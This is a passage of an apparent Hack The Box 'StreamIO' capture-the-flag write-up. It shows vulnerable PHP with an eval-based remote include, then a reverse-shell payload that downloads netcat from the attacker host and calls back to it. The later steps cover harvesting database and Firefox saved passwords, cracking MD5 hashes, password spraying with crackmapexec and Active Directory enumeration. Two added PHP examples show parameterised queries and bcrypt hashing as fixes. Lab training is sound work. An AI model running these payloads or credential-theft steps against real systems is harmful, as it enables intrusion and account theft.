$query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['username']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST">
<input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" )
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>
Create reverse shell - yoshihide¶
Prepare revshell: revshell.php (no opening <?php tag, because master.php passes the fetched body straight to eval())¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat revshell.php
system("powershell -c wget 10.10.14.6/nc64.exe -outfile \\programdata\\nc64.exe");
system("\\programdata\\nc64.exe -e powershell 10.10.14.6 443");
Run Python webserver on port 80¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.158 - - [04/Apr/2024 15:40:25] "GET /revshell.php HTTP/1.0" 200 -
10.10.11.158 - - [04/Apr/2024 15:40:25] "GET /nc64.exe HTTP/1.1" 200 -
Start netcat listening on port 443 (before sending the request, so the callback has something to connect to)¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
Send the request via POST (curl)¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ curl -k -X POST -d "include=http://10.10.14.6/revshell.php" -b "PHPSESSID=sarnm1o7pdvrh50o5tu03rheqe" "https://streamio.htb/admin/?debug=master.php"
Whoami - yoshihide¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.158] 59265
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\inetpub\streamio.htb\admin> whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================== ==============================================
streamio\yoshihide S-1-5-21-1470860369-1569627196-4264678630-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Access to backup database¶
Find creds to old databse¶
I read the file search.php and found the query section:
# Query section
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
___
PS C:\inetpub\watch.streamio.htb> pwd
pwd
Path
----
C:\inetpub\watch.streamio.htb
PS C:\inetpub\watch.streamio.htb> type search.php
type search.php
<?php
$search = strtolower($_POST['q']);
// sqlmap choker
$shitwords = ["/WAITFOR/i", "/vkBQ/i", "/CHARINDEX/i", "/ALL/i", "/SQUARE/i", "/ORDER/i", "/IF/i","/DELAY/i", "/NULL/i", "/UNICODE/i","/0x/i", "/\*\*/", "/-- [a-z0-9]{4}/i", "ifnull/i", "/ or /i"];
foreach ($shitwords as $shitword) {
if (preg_match( $shitword, $search )) {
header("Location: https://watch.streamio.htb/blocked.php");
die("blocked");
}
}
# Query section
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
if (!isset($_POST['q']))
{
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
else
{
$_SESSION['no_of_reqs'] +=1;
$query = "select * from movies where movie like '%".$_POST['q']."%' order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Streamio</title>
<link rel = "icon" href="static/icon.png" type = "image/x-icon">
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
<link rel="stylesheet" type="text/css" href="static/css/bootstrap.css">
<link rel="stylesheet" type="text/css" href="static/css/search.css">
<script type="text/javascript">
function unavailable() {
alert("Movie Steaming is currently unavailable due to Some security issues");
}
</script>
</head>
<body>
<center>
<img id="logo" src="static/logo.png">
</center>
<br><br>
<h3>Search for a movie:</h3>
<form action="/search.php" method="POST">
<div class="input-group">
<input type="text" name="q" class="form-control" autofocus>
<button type="submit" class="btn btn-primary">Search</button>
</div>
</form>
<br><br>
<div>
<?php
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
echo '<div class="d-flex movie align-items-end">
<div class="mr-auto p-2">
<h5 class="p-2">'.$row["movie"].'</h5>
</div>
<div class="ms-auto p-2">
<span class="">'.$row["year"] .'</span>
<button class="btn btn-dark" onclick="unavailable();">Watch</button>
</div>
</div>';
}
?>
</div>
</body>
</html>
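As an added example, not code from the box or from this writeup: the same search handler rewritten so the user's term is bound as a query parameter instead of being concatenated into the SQL string. The "sqlmap choker" blocklist is dropped because it filtered signatures without fixing the injection. The environment variable names STREAMIO_DB_USER and STREAMIO_DB_PASS are assumptions.

```php
<?php
// Added example (not the StreamIO box's own search.php): parameterised
// version of the movie search. Assumes the same sqlsrv extension, (local)
// server and STREAMIO database as the original; credentials come from the
// environment instead of being hard-coded in every PHP file under C:\inetpub.

function search_movies(?string $q): array
{
    $connection = [
        "Database" => "STREAMIO",
        "UID"      => getenv("STREAMIO_DB_USER"),   // assumed variable name
        "PWD"      => getenv("STREAMIO_DB_PASS"),   // assumed variable name
    ];
    $handle = sqlsrv_connect('(local)', $connection);
    if ($handle === false) {
        // Log driver errors server-side only; never echo them to the client.
        error_log(print_r(sqlsrv_errors(), true));
        return [];
    }

    if ($q === null || $q === '') {
        $sql    = "SELECT movie, year FROM movies ORDER BY movie";
        $params = [];
    } else {
        // Cap the length (mbstring assumed) and escape LIKE wildcards so a
        // search for "100%" matches literally instead of turning into a wildcard.
        $q       = mb_substr($q, 0, 100);
        $escaped = strtr($q, ['\\' => '\\\\', '%' => '\\%', '_' => '\\_']);
        $sql     = "SELECT movie, year FROM movies "
                 . "WHERE movie LIKE ? ESCAPE '\\' ORDER BY movie";
        $params  = ['%' . $escaped . '%'];   // bound parameter, never concatenated
    }

    $res = sqlsrv_query($handle, $sql, $params, ["Scrollable" => "buffered"]);
    if ($res === false) {
        error_log(print_r(sqlsrv_errors(), true));
        sqlsrv_close($handle);
        return [];
    }
    $rows = [];
    while ($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)) {
        $rows[] = $row;
    }
    sqlsrv_free_stmt($res);
    sqlsrv_close($handle);
    return $rows;
}

// Rendering: escape every value on output so a stored title cannot inject HTML.
foreach (search_movies($_POST['q'] ?? null) as $row) {
    printf(
        '<div class="d-flex movie align-items-end"><h5 class="p-2">%s</h5>'
        . '<span>%s</span></div>',
        htmlspecialchars($row["movie"], ENT_QUOTES, 'UTF-8'),
        htmlspecialchars((string) $row["year"], ENT_QUOTES, 'UTF-8')
    );
}
```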
Find other strings of the same format¶
We found:
C:\inetpub\streamio.htb\admin\index.php:9:$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" =>
'B1@hx31234567890');
C:\inetpub\streamio.htb\login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" =>
'B1@hB1@hB1@h');
C:\inetpub\streamio.htb\login.php:47:$handle = sqlsrv_connect('(local)',$connection);
C:\inetpub\streamio.htb\register.php:81: $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" =>
'B1@hx31234567890');
search.php:15:$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
___
PS C:\inetpub\watch.streamio.htb> dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
dir : Access to the path 'C:\inetpub\logs\LogFiles\W3SVC1' is denied.
At line:1 char:1
+ dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\logs\LogFiles\W3SVC1:String) [Get-ChildItem], Unauthorized
AccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
dir : Access to the path 'C:\inetpub\logs\LogFiles\W3SVC2' is denied.
At line:1 char:1
+ dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\logs\LogFiles\W3SVC2:String) [Get-ChildItem], Unauthorized
AccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
dir : Access to the path 'C:\inetpub\logs\LogFiles\W3SVC3' is denied.
At line:1 char:1
+ dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\logs\LogFiles\W3SVC3:String) [Get-ChildItem], Unauthorized
AccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
C:\inetpub\streamio.htb\admin\index.php:9:$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" =>
'B1@hx31234567890');
C:\inetpub\streamio.htb\admin\index.php:10:$handle = sqlsrv_connect('(local)',$connection);
C:\inetpub\streamio.htb\login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" =>
'B1@hB1@hB1@h');
C:\inetpub\streamio.htb\login.php:47:$handle = sqlsrv_connect('(local)',$connection);
C:\inetpub\streamio.htb\register.php:81: $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" =>
'B1@hx31234567890');
C:\inetpub\streamio.htb\register.php:82: $handle = sqlsrv_connect('(local)',$connection);
dir : Access to the path 'C:\inetpub\temp\appPools' is denied.
At line:1 char:1
+ dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\temp\appPools:String) [Get-ChildItem], UnauthorizedAccessE
xception
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
dir : Access to the path 'C:\inetpub\temp\IIS Temporary Compressed Files' is denied.
At line:1 char:1
+ dir -recurse C:\inetpub\*.php | select-string -pattern "connection"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\temp...ompressed Files:String) [Get-ChildItem], Unauthoriz
edAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
search.php:15:$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
search.php:16:$handle = sqlsrv_connect('(local)',$connection);
Read usernames and passwords from the database backup (streamio_backup DB)¶
The sqlcmd tool is available on the victim:
PS C:\inetpub\streamio.htb\admin> where.exe sqlcmd
where.exe sqlcmd
C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE
PS C:\inetpub\streamio.htb\admin>
---
1. Show all tables
PS C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select table_name from streamio_backup.information_schema.tables;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select table_name from streamio_backup.information_schema.tables;"
table_name
--
movies
users
---
2. List all usernames and passwords
PS C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
id username password
----------- -------------------------------------------------- --------------------------------------------------
1 nikk37 389d14cb8e4e9b94b137deb1caf0612a
2 yoshihide b779ba15cedfd22a023c4d8bcf5f2332
3 James c660060492d9edcaa8332d89c99c9239
4 Theodore 925e5408ecb67aea449373d668b7359e
5 Samantha 083ffae904143c4796e464dac33c1f7d
6 Lauren 08344b85b329d7efd611b7a7743e8a09
7 William d62be0dc82071bccc1322d64ec5b6c51
8 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5
(8 rows affected)
Crack passwords¶
Create a text file with logins and hashes¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat user_password_db_backup_hash_prev | awk '{print $2":"$3}' | tee user_password_db_backup_hash
nikk37:389d14cb8e4e9b94b137deb1caf0612a
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332
James:c660060492d9edcaa8332d89c99c9239
Theodore:925e5408ecb67aea449373d668b7359e
Samantha:083ffae904143c4796e464dac33c1f7d
Lauren:08344b85b329d7efd611b7a7743e8a09
William:d62be0dc82071bccc1322d64ec5b6c51
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5
Cracking hashes¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ hashcat user_password_db_backup_hash /usr/share/wordlists/rockyou.txt -m0 --user --show
nikk37:389d14cb8e4e9b94b137deb1caf0612a:[email protected]
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
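As an added example, not code from the box or from this writeup: a login check for the users table that still accepts the legacy unsalted MD5 rows but, on each successful login, replaces the row with a salted bcrypt hash, so a future copy of the database no longer yields hashes that fall to rockyou in seconds. It assumes an already-open sqlsrv connection $handle to the STREAMIO database and the users(id, username, password) columns shown above.

```php
<?php
// Added example (not the StreamIO box's own login.php). The backup users
// table holds unsalted MD5 (hashcat -m 0 cracked four of eight rows with
// rockyou). This check verifies a legacy row and upgrades it in place to
// password_hash() output, so the table migrates itself as users log in.
// Note: bcrypt output is 60 characters; the password column must be widened
// from the 50 shown in the dump (e.g. NVARCHAR(255)) before deploying this.

const HASH_OPTS = ["cost" => 12];

function store_new_hash($handle, int $id, string $password): void
{
    $new = password_hash($password, PASSWORD_BCRYPT, HASH_OPTS);
    sqlsrv_query($handle, "UPDATE users SET password = ? WHERE id = ?", [$new, $id]);
}

function check_login($handle, string $username, string $password): bool
{
    // Username is bound as a parameter; no string concatenation into the SQL.
    $res = sqlsrv_query($handle, "SELECT id, password FROM users WHERE username = ?", [$username]);
    if ($res === false) {
        return false;
    }
    $row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC);
    sqlsrv_free_stmt($res);
    if ($row === null || $row === false) {
        // Unknown user: still spend a hash computation so response time
        // does not reveal which usernames exist.
        password_hash($password, PASSWORD_BCRYPT, HASH_OPTS);
        return false;
    }

    $stored = (string) $row["password"];
    if (preg_match('/^[0-9a-f]{32}$/i', $stored)) {
        // Legacy unsalted MD5 row, the format found in streamio_backup.
        if (!hash_equals(strtolower($stored), md5($password))) {
            return false;
        }
        store_new_hash($handle, (int) $row["id"], $password);   // upgrade now
        return true;
    }

    if (!password_verify($password, $stored)) {
        return false;
    }
    if (password_needs_rehash($stored, PASSWORD_BCRYPT, HASH_OPTS)) {
        store_new_hash($handle, (int) $row["id"], $password);   // cost raised later
    }
    return true;
}
```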
Crackmapexec¶
Create the users and password files¶
Create the files users and password (the lists of usernames and passwords taken from the hashcat output files):
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat user_password_db.hash_output user_password_db_backup_hash | awk -F':' '{print $1}' > users
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat user_password_db.hash_output user_password_db_backup_hash_output | awk -F':' '{print $3}' > password
Find a login and password that allow us to log in¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ crackmapexec smb 10.10.11.158 -u users -p password --continue-on-success | grep "+"
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:[email protected]
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ crackmapexec winrm 10.10.11.158 -u users -p password --continue-on-success | grep "+"
WINRM 10.10.11.158 5985 DC [+] streamIO.htb\nikk37:[email protected] (Pwn3d!)
Evil-winrm¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ evil-winrm -u nikk37 -p '[email protected]' -i 10.10.11.158
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nikk37\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=============== ==============================================
streamio\nikk37 S-1-5-21-1470860369-1569627196-4264678630-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Read flag: user.txt¶
*Evil-WinRM* PS C:\Users\nikk37\Documents>
*Evil-WinRM* PS C:\Users\nikk37\Documents> cd ..
*Evil-WinRM* PS C:\Users\nikk37> cd Desktop
*Evil-WinRM* PS C:\Users\nikk37\Desktop> dir
Directory: C:\Users\nikk37\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/8/2024 8:56 AM 34 user.txt
*Evil-WinRM* PS C:\Users\nikk37\Desktop> type user.txt
dce217496720adbf24480d1686da09c3
*Evil-WinRM* PS C:\Users\nikk37\Desktop>
Find passwords from Firefox folder¶
Download firepwd.py¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ git clone https://github.com/lclevy/firepwd.git
Cloning into 'firepwd'...
remote: Enumerating objects: 88, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 88 (delta 2), reused 3 (delta 0), pack-reused 80
Receiving objects: 100% (88/88), 239.08 KiB | 832.00 KiB/s, done.
Resolving deltas: 100% (41/41), done.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cd firepwd
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_StreamIO/firepwd]
└─$ dir
firepwd.py LICENSE mozilla_db mozilla_pbe.pdf mozilla_pbe.svg readme.md requirements.txt
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_StreamIO/firepwd]
Download files: key4.db and logins.json¶
*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\FireFox\Profiles\br53rxeg.default-release> download key4.db
Info: Downloading C:\Users\nikk37\AppData\roaming\mozilla\FireFox\Profiles\br53rxeg.default-release\key4.db to key4.db
Info: Download successful!
*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\FireFox\Profiles\br53rxeg.default-release> download logins.json
Info: Downloading C:\Users\nikk37\AppData\roaming\mozilla\FireFox\Profiles\br53rxeg.default-release\logins.json to logins.json
Info: Download successful!
*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\FireFox\Profiles\br53rxeg.default-release>
Extract passwords¶
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_StreamIO/firepwd]
└─$ python3 firepwd.py
globalSalt: b'd215c391179edb56af928a06c627906bcbd4bd47'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'1baafcd931194d48f8ba5775a41f'
}
}
}
OCTETSTRING b'12e56d1c8458235a4136b280bd7ef9cf'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'e28a1fe8bcea476e94d3a722dd96'
}
}
}
OCTETSTRING b'51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266'
}
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
Crackmapexec and WinRM¶
We add the new logins and passwords to the lists users and password.
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ crackmapexec smb 10.10.11.158 -u users -p password --continue-on-success | grep "+"
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:[email protected]
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:[email protected]
SMB 10.10.11.158 445 DC [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
---
JDgodd doesn't have permission to use WinRM:
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ crackmapexec winrm 10.10.11.158 -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r'
SMB 10.10.11.158 5985 DC [*] Windows 10.0 Build 17763 (name:DC) (domain:streamIO.htb)
HTTP 10.10.11.158 5985 DC [*] http://10.10.11.158:5985/wsman
WINRM 10.10.11.158 5985 DC [-] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
BloodHound¶
Collect info¶
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_StreamIO/BloodHound]
└─$ bloodhound-python -c All -u jdgodd -p 'JDg0dd1s@d0p3cr3@t0r' -ns 10.10.11.158 -d streamio.htb -dc streamio.htb
INFO: Found AD domain: streamio.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 8 users
INFO: Found 54 groups
INFO: Found 4 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
INFO: Done in 00M 09S
Import data¶
Run commands:
sudo neo4j console
bloodhound
___
└─$ sudo neo4j console
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2024-04-08 12:51:20.115+0000 INFO Starting...
2024-04-08 12:51:20.966+0000 INFO This instance is ServerId{0f09f652} (0f09f652-c95a-49aa-9cdb-212f6e771b11)
2024-04-08 12:51:24.177+0000 INFO ======== Neo4j 4.4.26 ========
2024-04-08 12:51:27.005+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2024-04-08 12:51:27.006+0000 INFO Updating the initial password in component 'security-users'
2024-04-08 12:51:29.373+0000 INFO Bolt enabled on localhost:7687.
2024-04-08 12:51:31.639+0000 INFO Remote interface available at http://localhost:7474/
2024-04-08 12:51:31.650+0000 INFO id: AF96C6329EC87C67BF9C98E343F792FFF2E03F35810146E66703FD2132CD5256
2024-04-08 12:51:31.651+0000 INFO name: system
2024-04-08 12:51:31.651+0000 INFO creationDate: 2023-04-06T13:10:25.992Z
2024-04-08 12:51:31.652+0000 INFO Started.
___
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_StreamIO/BloodHound]
└─$ bloodhound
(node:447917) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron. See https://github.com/electron/electron/issues/23506 for more information
(node:447959) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.
(BloodHound:447917): GVFS-RemoteVolumeMonitor-WARNING **: 14:52:18.944: remote volume monitor with dbus name org.gtk.vfs.UDisks2VolumeMonitor is not supported
Analysis¶
JDgodd has ownership and WriteOwner on the Core Staff group:
Get LAPS Password¶
Download PowerView.ps1¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 ; file PowerView.ps1
--2024-04-08 15:03:06-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770279 (752K) [text/plain]
Saving to: ‘PowerView.ps1’
PowerView.ps1 100%[==============================================>] 752.23K --.-KB/s in 0.1s
2024-04-08 15:03:06 (6.61 MB/s) - ‘PowerView.ps1’ saved [770279/770279]
PowerView.ps1: ASCII text
Upload PowerView.ps1¶
*Evil-WinRM* PS C:\Users\nikk37\Desktop> upload /mnt/oscp/writeups/HTB/HTB_StreamIO/PowerView.ps1
Info: Uploading /mnt/oscp/writeups/HTB/HTB_StreamIO/PowerView.ps1 to C:\Users\nikk37\Desktop\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\nikk37\Desktop> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\nikk37\Desktop>
Create a variable with credentials¶
